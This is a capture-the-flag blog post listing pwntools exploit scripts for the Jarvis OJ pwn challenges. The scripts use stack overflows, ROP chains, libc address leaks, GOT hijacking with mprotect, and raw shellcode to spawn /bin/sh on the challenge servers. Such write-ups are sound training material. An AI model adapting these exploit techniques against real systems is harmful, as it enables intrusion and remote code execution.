I recently worked through part of the Jarvis OJ pwn challenges and learned a lot. For now this post just records the exploit scripts; the analysis and reasoning will be added later.


Tell Me Something
This challenge is similar to level0; see the level0 writeup:
http://www.cnblogs.com/WangAoBo/p/7591552.html
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Python 2 + pwntools (old API: print statement, generator .next())
__Auther__ = 'M4x'
from pwn import *

elf = ELF('./guestbook')
good_game_addr = elf.symbols['good_game']  # function that prints the flag
# io = process('./guestbook')
io = remote('pwn.jarvisoj.com', 9876)

# 0x88 bytes of padding reach the saved return address, which is overwritten with good_game
payload = 'A' * 0x88 + p64(good_game_addr)
io.recvuntil('message:\n')
io.send(payload)
print io.recvall()
io.close()

Smashes

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'
from pwn import *
context.log_level = 'debug'

flag_addr = 0x400d21
# offset = 0x7fffffffcd68 - 0x7fffffffcb50
# payload = 'A' * offset + p64(flag_addr)
# spray the flag address so that it also overwrites the pointer used by the stack-smashing handler
payload = p64(flag_addr) * 200

io = remote('pwn.jarvisoj.com', 9877)
# io = process('./smashes')
io.recvuntil('name? ')
io.sendline(payload)
# io.recvuntil('flag: ')
io.recv()
io.sendline()
io.recv()  # the flag shows up in the debug log

Test Your Memory
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'
from pwn import *
context.log_level = 'debug'

elf = ELF('./memory')
win_func_addr = elf.symbols['win_func']
cat_flag_addr = elf.search('cat flag').next()  # "cat flag" string inside the binary
# 0x13-byte buffer + 4 bytes saved ebp, then win_func, a fake return address, and its argument
payload = 'A' * (0x13 + 0x4) + p32(win_func_addr) + p32(win_func_addr) + p32(cat_flag_addr)

# io = process('./memory')
io = remote('pwn2.jarvisoj.com', 9876)
io.recvuntil('> ')
io.sendline(payload)
print io.recvall()
io.close()

[XMAN]level0

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'
from pwn import *
context.log_level = 'debug'

elf = ELF('./level0')
callsys_addr = elf.symbols['callsystem']  # function that calls system("/bin/sh")
# io = process('./level0')
io = remote('pwn2.jarvisoj.com', 9881)
io.recvuntil('World\n')
# 0x80-byte buffer + 8 bytes saved rbp, then the return address
payload = 'A' * (0x80 + 0x8) + p64(callsys_addr)
io.send(payload)
io.interactive()
io.close()

[XMAN]level1

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'
from pwn import *
context.log_level = 'debug'

shellcode = asm(shellcraft.i386.linux.sh())  # no NX, so the stack buffer is executable
# io = process('./level1')
io = remote('pwn2.jarvisoj.com', 9877)
# the program prints the buffer address; cut the hex string out of that line
text = io.recvline()[14: -2]
# print text[14:-2]
buf_addr = int(text, 16)
# shellcode at the start of the buffer, padding up to the return address, then jump back into the buffer
payload = shellcode + 'A' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)
io.send(payload)
io.interactive()
io.close()

[XMAN]level2

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'
from pwn import *
context.log_level = 'debug'

elf = ELF('./level2')
sys_addr = elf.symbols['system']
sh_addr = elf.search('/bin/sh').next()  # "/bin/sh" string inside the binary
# ret2system: system, a fake return address, then the argument on the stack (x86 cdecl)
payload = 'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)

# io = process('./level2')
io = remote('pwn2.jarvisoj.com', 9878)
io.recvuntil('Input:\n')
io.send(payload)
io.interactive()
io.close()

[XMAN]level2_x64

level2_x64 and level3_x64 are analysed together here:
http://www.cnblogs.com/WangAoBo/p/7966773.html
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'
from pwn import *
context.log_level = 'debug'

elf = ELF('./level2_x64')
sys_addr = elf.symbols['system']
sh_addr = elf.search('/bin/sh').next()
rop = ROP(elf)
p_rdi_r_addr = rop.rdi[0]  # pop rdi; ret -- first argument goes in rdi on x64
# print type(p_rdi_r_addr)
payload = 'A' * (0x80 + 0x8) + p64(p_rdi_r_addr) + p64(sh_addr) + p64(sys_addr) + p64(0xdeadbeef)

# io = process('./level2_x64')
io = remote('pwn2.jarvisoj.com', 9882)
io.recvuntil('Input:\n')
io.send(payload)
io.interactive()
io.close()

[XMAN]level3

level2_x64 and level3_x64 are analysed together here:
http://www.cnblogs.com/WangAoBo/p/7966773.html
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'
from pwn import *
context.log_level = 'debug'

local = 0
if local:
    io = process('./level3')
    libc = ELF('/lib/i386-linux-gnu/libc.so.6')
else:
    io = remote('pwn2.jarvisoj.com', 9879)
    libc = ELF('./libc-2.19.so')  # libc shipped with the challenge

elf = ELF('./level3')
start_elf_addr = elf.symbols['_start']
write_elf_addr = elf.symbols['write']
read_got_addr = elf.got['read']
read_libc_addr = libc.symbols['read']
sys_libc_addr = libc.symbols['system']
sh_libc_addr = libc.search('/bin/sh').next()

# stage 1: write(1, read@got, 4) leaks the libc address of read, then return to _start
payload = 'A' * (0x88 + 0x04) + p32(write_elf_addr) + p32(start_elf_addr) + p32(0x1) + p32(read_got_addr) + p32(0x4)
io.recvuntil('Input:\n')
io.send(payload)
read_addr = u32(io.recv(4))

# libc base offset from the leak, then resolve system and "/bin/sh"
offset = read_addr - read_libc_addr
sys_addr = offset + sys_libc_addr
sh_addr = offset + sh_libc_addr

# stage 2: system("/bin/sh")
payload = 'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)
io.recvuntil('Input:\n')
io.send(payload)
io.interactive()
io.close()

[XMAN]level3_x64

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'
from pwn import *
context.log_level = 'debug'

local = 0
if local:
    io = process('./level3_x64')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    io = remote('pwn2.jarvisoj.com', 9883)
    libc = ELF('./libc-2.19.so')  # libc shipped with the challenge

elf = ELF('./level3_x64')
start_elf_addr = elf.symbols['_start']
write_elf_addr = elf.symbols['write']
read_got_addr = elf.got['read']
read_libc_addr = libc.symbols['read']
sys_libc_addr = libc.symbols['system']
sh_libc_addr = libc.search('/bin/sh').next()

# x64 passes arguments in registers, so gadgets are needed to load rdi and rsi
rop = ROP(elf)
p_rdi_r_addr = rop.rdi[0]      # pop rdi; ret
p_rsi_r15_r_addr = rop.rsi[0]  # pop rsi; pop r15; ret

# stage 1: write(1, read@got, ...) leaks the libc address of read, then return to _start
payload = 'A' * (0x80 + 0x8)
payload += p64(p_rdi_r_addr)
payload += p64(0x1)
payload += p64(p_rsi_r15_r_addr)
payload += p64(read_got_addr)
payload += p64(0x0)  # junk for r15
payload += p64(write_elf_addr)
payload += p64(start_elf_addr)
io.recvuntil('Input:\n')
io.send(payload)
read_addr = u64(io.recv(0x8))

# libc base offset from the leak, then resolve system and "/bin/sh"
offset = read_addr - read_libc_addr
sys_addr = offset + sys_libc_addr
sh_addr = offset + sh_libc_addr

# stage 2: system("/bin/sh")
payload = 'A' * (0x80 + 0x8)
payload += p64(p_rdi_r_addr)
payload += p64(sh_addr)
payload += p64(sys_addr)
payload += p64(0xdeadbeef)
io.recvuntil('Input:\n')
io.send(payload)
io.interactive()
io.close()

[XMAN]level4

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'
from pwn import *
context.log_level = 'debug'

# io = process('./level4')
io = remote('pwn2.jarvisoj.com', 9880)
elf = ELF('./level4')
write_elf_addr = elf.symbols['write']
start_elf_addr = elf.symbols['_start']
read_elf_addr = elf.symbols['read']
bss_addr = elf.bss()

# no libc is provided: leak arbitrary memory with write(1, addr, 4) and let DynELF resolve system
def leak(addr):
    payload = 'A' * (0x88 + 0x4) + p32(write_elf_addr) + p32(start_elf_addr) + p32(0x1) + p32(addr) + p32(0x4)
    io.send(payload)
    leaked = io.recv(4)
    log.info("leaked -> %s -> 0x%x" % (leaked, u32(leaked)))
    return leaked

d = DynELF(leak, elf = ELF('./level4'))
sys_addr = d.lookup('system', 'libc')
log.info("sys_addr -> 0x%x" % sys_addr)

# read(0, bss, 8) places "/bin/sh\0" in .bss, then return to _start
payload = 'A' * (0x88 + 0x4) + p32(read_elf_addr) + p32(start_elf_addr) + p32(0x0) + p32(bss_addr) + p32(0x8)
io.send(payload)
io.send('/bin/sh\0')
sh_addr = bss_addr

# system("/bin/sh")
payload = 'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)
io.send(payload)
io.interactive()
io.close()

[XMAN]level5

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'
from pwn import *

def Debug():
    raw_input("waiting for debug:")
    gdb.attach(io, "b *0x0000000000400618")

context.terminal = ['deepin-terminal', '-x', 'bash', '-c']
context.log_level = 'debug'

elf = ELF('./level5')
rop = ROP(elf)
p_rdi_r_addr = rop.rdi[0]      # pop rdi; ret
p_rsi_r15_r_addr = rop.rsi[0]  # pop rsi; pop r15; ret
# __libc_csu_init gadgets: "pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret"
# and "mov rdx, r13; mov rsi, r14; mov edi, r15d; call [r12 + rbx*8]"
p_rbx_rbp_r12_r13_r14_r15_r = 0x00000000004006aa
mov_call = 0x0000000000400690

local = 0
if local:
    io = process('./level5')
    libc = ELF('./libc.so.6')
else:
    io = remote('pwn2.jarvisoj.com', 9884)
    libc = ELF('./libc-2.19.so')
io.recvuntil('Input:\n')

log.info("Step 1: leak read_addr")
read_libc_addr = libc.symbols['read']
read_got_addr = elf.got['read']
write_elf_addr = elf.symbols['write']
vuln_elf_addr = elf.symbols['vulnerable_function']
# write(1, read@got, rdx): rdx is not set by this chain and keeps the count of the previous read
payload = 'A' * (0x80 + 0x8)
payload += p64(p_rdi_r_addr)
payload += p64(0x1)
payload += p64(p_rsi_r15_r_addr)
payload += p64(read_got_addr)
payload += p64(0x0000)  # junk for r15
payload += p64(write_elf_addr)
payload += p64(vuln_elf_addr)  # return to the vulnerable function for the next stage
io.send(payload)
read_addr = u64(io.recv(8))
io.recvuntil('Input:\n')
log.info("leaked read_addr -> 0x%x" % read_addr)

log.info("Step 2: write shellcode 2 bss")
sh_addr = bss_addr = elf.bss()
shellcode = "\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05"
# csu chain: call [read@got] as read(0, bss, len(shellcode) + 1)
payload = 'B' * (0x80 + 0x8)
payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)
payload += p64(0x0)                  # rbx
payload += p64(0x1)                  # rbp (rbx + 1 == rbp, so the csu loop exits after one call)
payload += p64(read_got_addr)        # r12 -> call [r12 + rbx*8]
payload += p64(len(shellcode) + 1)   # r13 -> rdx
payload += p64(bss_addr)             # r14 -> rsi
payload += p64(0x0)                  # r15 -> edi
payload += p64(mov_call)
payload += 'C' * (7 * 8)             # "add rsp, 8" plus the six pops after the call
payload += p64(vuln_elf_addr)
io.send(payload)
io.send(shellcode + '\0')
io.recvuntil('Input:\n')

log.info("Step 3: hijack mprotect 2 __gmon_start__")
mprotect_addr = read_addr - read_libc_addr + libc.symbols['mprotect']
mprotect_hijack_addr = 0x0000000000600a70
# csu chain: read(0, 0x600a70, 8) writes the libc address of mprotect into the GOT slot
payload = 'D' * (0x80 + 0x8)
payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(read_got_addr)
payload += p64(0x8)
payload += p64(mprotect_hijack_addr)
payload += p64(0x0)
payload += p64(mov_call)
payload += 'E' * (7 * 8)
payload += p64(vuln_elf_addr)
io.send(payload)
io.send(p64(mprotect_addr))
io.recvuntil('Input:\n')

log.info("Step 4: hijack sh/bss 2 __libc_start_main")
sh_hijack_addr = 0x0000000000600a68
# csu chain: read(0, 0x600a68, 8) writes the bss (shellcode) address into the GOT slot
payload = 'F' * (0x80 + 0x8)
payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(read_got_addr)
payload += p64(0x8)
payload += p64(sh_hijack_addr)
payload += p64(0x0)
payload += p64(mov_call)
payload += 'G' * (7 * 8)
payload += p64(vuln_elf_addr)
io.send(payload)
io.send(p64(sh_addr))
io.recvuntil('Input:\n')

log.info("Step 5: fix bss 2 777")
# csu chain: call [0x600a70] as mprotect(0x600000, 0x1000, 7), making the page holding .bss RWX
payload = 'H' * (0x80 + 0x8)
payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(mprotect_hijack_addr)
payload += p64(0x7)        # rdx = PROT_READ | PROT_WRITE | PROT_EXEC
# payload += p64(len(shellcode) + 1)
# payload += p64(sh_hijack_addr)
payload += p64(0x1000)     # rsi = length
payload += p64(0x00600000) # edi = page-aligned address
payload += p64(mov_call)
payload += 'I' * (7 * 8)
payload += p64(vuln_elf_addr)
# Debug()
io.send(payload)
io.recvuntil('Input:\n')

log.info("Step 6: execv shllcode")
# csu chain: call [0x600a68] jumps into the shellcode now sitting in the executable .bss
payload = 'J' * (0x80 + 0x8)
# payload += p64(sh_addr)
payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(sh_hijack_addr)
payload += p64(0x0)
payload += p64(0x0)
payload += p64(0x0)
payload += p64(mov_call)
payload += p64(vuln_elf_addr)
io.send(payload)

log.info("Step 7: getshell")
io.interactive()
io.close()
